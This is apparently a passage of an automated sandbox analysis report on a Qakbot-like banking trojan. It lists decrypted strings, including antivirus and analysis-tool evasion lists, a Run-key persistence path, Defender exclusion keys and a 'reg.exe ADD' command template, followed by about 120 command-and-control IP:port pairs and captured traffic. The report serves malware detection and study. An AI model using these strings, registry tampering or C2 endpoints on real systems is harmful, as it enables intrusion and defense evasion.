            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: winsta0\default
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .dat
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WBJ_IGNORE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: next
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wpcap.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/pjpeg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: fmon.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: vbs
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aswhooka.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SysWOW64
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: mpr.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/gif
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: crypt32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ntdll.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: open
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SystemRoot
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cscript.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/jpeg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LocalLow
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: displayName
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: shlwapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CommandLine
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: kernel32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: 1234567890
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wbj.go
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_DiskDrive
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: System32
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Name
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WRSA.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: c:\\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SpyNetReporting
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: FALSE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aswhookx.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Packages
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: RepUx.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Winsta0
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: root\SecurityCenter2
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: MsMpEng.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: userenv.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: csc_ui.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: \\.\pipe\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: pstorec.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: NTUSER.DAT
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: from
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: netapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: gdi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: setupapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: iphlpapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CrAmTray.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: user32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: \sf2.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Software\Microsoft
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %S.%06d
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: bcrypt.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wtsapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: shell32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: TRUE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Bios
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: */*
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ByteFence.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: type=0x%04X
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ROOT\CIMV2
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: https
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: fshoster32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: kernelbase.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: regsvr32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %s\system32\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Process
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: rundll32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LOCALAPPDATA
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cmd.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: APPDATA
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: select
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: mcshield.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: advapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ws2_32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .cfg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Product
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WQL
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wininet.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LastBootUpTime
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: urlmon.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Create
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_PnPEntity
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Initializing database...
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: winsta0\default
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .dat
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WBJ_IGNORE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: next
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wpcap.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/pjpeg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: fmon.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: vbs
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aswhooka.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SysWOW64
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: mpr.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/gif
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: crypt32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ntdll.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: open
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: unknownHTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.3:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 72.163.4.185:443 -> 192.168.2.3:49703 version: TLS 1.2
            Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.385452073.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
            Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.385452073.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:
            Source: C:\Windows\System32\msiexec.exeFile opened: x:
            Source: C:\Windows\System32\msiexec.exeFile opened: v:
            Source: C:\Windows\System32\msiexec.exeFile opened: t:
            Source: C:\Windows\System32\msiexec.exeFile opened: r:
            Source: C:\Windows\System32\msiexec.exeFile opened: p:
            Source: C:\Windows\System32\msiexec.exeFile opened: n:
            Source: C:\Windows\System32\msiexec.exeFile opened: l:
            Source: C:\Windows\System32\msiexec.exeFile opened: j:
            Source: C:\Windows\System32\msiexec.exeFile opened: h:
            Source: C:\Windows\System32\msiexec.exeFile opened: f:
            Source: C:\Windows\System32\msiexec.exeFile opened: b:
            Source: C:\Windows\System32\msiexec.exeFile opened: y:
            Source: C:\Windows\System32\msiexec.exeFile opened: w:
            Source: C:\Windows\System32\msiexec.exeFile opened: u:
            Source: C:\Windows\System32\msiexec.exeFile opened: s:
            Source: C:\Windows\System32\msiexec.exeFile opened: q:
            Source: C:\Windows\System32\msiexec.exeFile opened: o:
            Source: C:\Windows\System32\msiexec.exeFile opened: m:
            Source: C:\Windows\System32\msiexec.exeFile opened: k:
            Source: C:\Windows\System32\msiexec.exeFile opened: i:
            Source: C:\Windows\System32\msiexec.exeFile opened: g:
            Source: C:\Windows\System32\msiexec.exeFile opened: e:
            Source: C:\Windows\System32\wscript.exeFile opened: c:
            Source: C:\Windows\System32\msiexec.exeFile opened: a:

            Networking

            barindex
            Source: Malware configuration extractorIPs: 24.234.220.88:990
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 96.56.197.26:2083
            Source: Malware configuration extractorIPs: 103.123.223.133:443
            Source: Malware configuration extractorIPs: 83.249.198.100:2222
            Source: Malware configuration extractorIPs: 199.27.66.213:443
            Source: Malware configuration extractorIPs: 90.104.151.37:2222
            Source: Malware configuration extractorIPs: 94.204.202.106:443
            Source: Malware configuration extractorIPs: 72.205.104.134:443
            Source: Malware configuration extractorIPs: 65.95.141.84:2222
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 82.131.141.209:443
            Source: Malware configuration extractorIPs: 77.126.99.230:443
            Source: Malware configuration extractorIPs: 71.38.155.217:443
            Source: Malware configuration extractorIPs: 205.237.67.69:995
            Source: Malware configuration extractorIPs: 84.215.202.8:443
            Source: Malware configuration extractorIPs: 24.234.220.88:465
            Source: Malware configuration extractorIPs: 76.178.148.107:2222
            Source: Malware configuration extractorIPs: 116.74.163.130:443
            Source: Malware configuration extractorIPs: 70.28.50.223:2087
            Source: Malware configuration extractorIPs: 147.147.30.126:2222
            Source: Malware configuration extractorIPs: 173.88.135.179:443
            Source: Malware configuration extractorIPs: 103.140.174.20:2222
            Source: Malware configuration extractorIPs: 77.86.98.236:443
            Source: Malware configuration extractorIPs: 92.149.250.113:2222
            Source: Malware configuration extractorIPs: 96.87.28.170:2222
            Source: Malware configuration extractorIPs: 86.168.210.41:443
            Source: Malware configuration extractorIPs: 176.142.207.63:443
            Source: Malware configuration extractorIPs: 12.172.173.82:32101
            Source: Malware configuration extractorIPs: 86.132.236.117:443
            Source: Malware configuration extractorIPs: 70.50.83.216:2222
            Source: Malware configuration extractorIPs: 161.142.103.187:995
            Source: Malware configuration extractorIPs: 45.62.70.33:443
            Source: Malware configuration extractorIPs: 12.172.173.82:465
            Source: Malware configuration extractorIPs: 178.175.187.254:443
            Source: Malware configuration extractorIPs: 83.110.223.61:443
            Source: Malware configuration extractorIPs: 105.184.209.194:995
            Source: Malware configuration extractorIPs: 41.186.88.38:443
            Source: Malware configuration extractorIPs: 102.156.10.183:443
            Source: Malware configuration extractorIPs: 27.109.19.90:2078
            Source: Malware configuration extractorIPs: 47.205.25.170:443
            Source: Malware configuration extractorIPs: 12.172.173.82:993
            Source: Malware configuration extractorIPs: 76.170.252.153:995
            Source: Malware configuration extractorIPs: 69.242.31.249:443
            Source: Malware configuration extractorIPs: 24.234.220.88:995
            Source: Malware configuration extractorIPs: 125.99.69.178:443
            Source: Malware configuration extractorIPs: 79.168.224.165:2222
            Source: Malware configuration extractorIPs: 75.143.236.149:443
            Source: Malware configuration extractorIPs: 14.192.241.76:995
            Source: Malware configuration extractorIPs: 124.122.47.148:443
            Source: Malware configuration extractorIPs: 81.229.117.95:2222
            Source: Malware configuration extractorIPs: 98.145.23.67:443
            Source: Malware configuration extractorIPs: 114.143.176.236:443
            Source: Malware configuration extractorIPs: 103.144.201.48:2078
            Source: Malware configuration extractorIPs: 122.186.210.254:443
            Source: Malware configuration extractorIPs: 69.160.121.6:61201
            Source: Malware configuration extractorIPs: 12.172.173.82:21
            Source: Malware configuration extractorIPs: 72.253.126.216:443
            Source: Malware configuration extractorIPs: 75.109.111.89:443
            Source: Malware configuration extractorIPs: 76.86.31.59:443
            Source: Malware configuration extractorIPs: 116.120.145.170:995
            Source: Malware configuration extractorIPs: 12.172.173.82:50001
            Source: Malware configuration extractorIPs: 81.101.185.146:443
            Source: Malware configuration extractorIPs: 201.244.108.183:995
            Source: Malware configuration extractorIPs: 68.203.69.96:443
            Source: Malware configuration extractorIPs: 103.139.242.6:443
            Source: Malware configuration extractorIPs: 103.42.86.42:995
            Source: Malware configuration extractorIPs: 85.61.165.153:2222
            Source: Malware configuration extractorIPs: 76.16.49.134:443
            Source: Malware configuration extractorIPs: 125.99.76.102:443
            Source: Malware configuration extractorIPs: 184.182.66.109:443
            Source: Malware configuration extractorIPs: 70.28.50.223:32100
            Source: Malware configuration extractorIPs: 50.68.204.71:993
            Source: Malware configuration extractorIPs: 85.57.212.13:3389
            Source: Malware configuration extractorIPs: 41.227.190.59:443
            Source: Malware configuration extractorIPs: 70.28.50.223:3389
            Source: Malware configuration extractorIPs: 31.53.29.235:2222
            Source: Malware configuration extractorIPs: 89.79.229.50:443
            Source: Malware configuration extractorIPs: 50.68.186.195:443
            Source: Malware configuration extractorIPs: 47.199.241.39:443
            Source: Malware configuration extractorIPs: 93.147.235.8:443
            Source: Malware configuration extractorIPs: 75.141.227.169:443
            Source: Malware configuration extractorIPs: 45.243.142.31:995
            Source: Malware configuration extractorIPs: 79.92.15.6:443
            Source: Malware configuration extractorIPs: 85.104.105.67:443
            Source: Malware configuration extractorIPs: 89.129.109.27:2222
            Source: Malware configuration extractorIPs: 86.176.83.44:2222
            Source: Malware configuration extractorIPs: 24.234.220.88:993
            Source: Malware configuration extractorIPs: 89.32.156.5:995
            Source: Malware configuration extractorIPs: 12.172.173.82:22
            Source: Malware configuration extractorIPs: 103.101.203.177:443
            Source: Malware configuration extractorIPs: 70.28.50.223:2083
            Source: Malware configuration extractorIPs: 98.187.21.2:443
            Source: Malware configuration extractorIPs: 70.49.205.198:2222
            Source: Malware configuration extractorIPs: 96.56.197.26:2222
            Source: Malware configuration extractorIPs: 92.9.45.20:2222
            Source: Malware configuration extractorIPs: 86.195.14.72:2222
            Source: Malware configuration extractorIPs: 172.115.17.50:443
            Source: Malware configuration extractorIPs: 100.4.163.158:2222
            Source: Malware configuration extractorIPs: 80.12.88.148:2222
            Source: Malware configuration extractorIPs: 213.64.33.92:2222
            Source: Malware configuration extractorIPs: 113.11.92.30:443
            Source: Malware configuration extractorIPs: 78.192.109.105:2222
            Source: Malware configuration extractorIPs: 47.34.30.133:443
            Source: Malware configuration extractorIPs: 122.184.143.86:443
            Source: Malware configuration extractorIPs: 198.2.51.242:993
            Source: Malware configuration extractorIPs: 165.120.169.171:2222
            Source: Malware configuration extractorIPs: 88.126.94.4:50000
            Source: Malware configuration extractorIPs: 82.125.44.236:2222
            Source: Malware configuration extractorIPs: 117.195.17.148:993
            Source: Malware configuration extractorIPs: 147.219.4.194:443
            Source: Malware configuration extractorIPs: 80.167.196.79:443
            Source: Malware configuration extractorIPs: 92.154.17.149:2222
            Source: Malware configuration extractorIPs: 184.181.75.148:443
            Source: Malware configuration extractorIPs: 95.45.50.93:2222
            Source: Malware configuration extractorIPs: 84.35.26.14:995
            Source: Malware configuration extractorIPs: 201.143.215.69:443
            Source: Malware configuration extractorIPs: 12.172.173.82:2087
            Source: Malware configuration extractorIPs: 50.68.204.71:443
            Source: Malware configuration extractorIPs: 64.121.161.102:443
            Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
            Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
            Source: Joe Sandbox ViewIP Address: 75.143.236.149 75.143.236.149
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cisco.comCache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.2.3:49705 -> 103.144.201.48:2078
            Source: unknownNetwork traffic detected: IP country count 32
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
